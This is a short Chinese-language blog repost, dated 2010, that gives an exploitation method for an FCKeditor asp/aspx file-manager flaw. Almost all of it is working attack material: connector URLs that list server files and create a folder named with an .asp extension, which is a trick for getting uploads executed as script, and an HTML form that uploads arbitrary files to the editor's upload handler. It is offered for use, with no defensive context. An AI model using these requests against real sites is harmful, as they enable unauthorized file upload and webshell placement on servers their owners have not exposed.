[bug]Fckeditor asp/aspx 版漏洞,构造上传的利用方法

2010年9月9日星期四 | | |

http://www.xxx.com//fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=&Type=File&CurrentFolder=/

直接浏览文件

直接创建文件夹(.asp):

http://www.xxx.com//fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder=%2F&NewFolderName=aaaa.asp&uuid=1279433158781

最后的&uuid=1279433158781可以有,也可以没有(随机的)

直接上传文件:

<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxx.com//fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">
Upload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
<input id="btnUpload" type="submit" value="Upload">
</form>

原文链接:http://www.hackline.net/a/special/wlgf/jbst/2010/0822/5506.html

0 评论:

发表评论

订阅: 博文评论 (Atom)

所有文章收集于网络,如果有牵扯到版权问题请与本站站长联系。谢谢合作![email protected]

 
Glossy Blue by N.Design Studio
Blogger Templates by Blogcrowds | Glossy Blue Blogger Template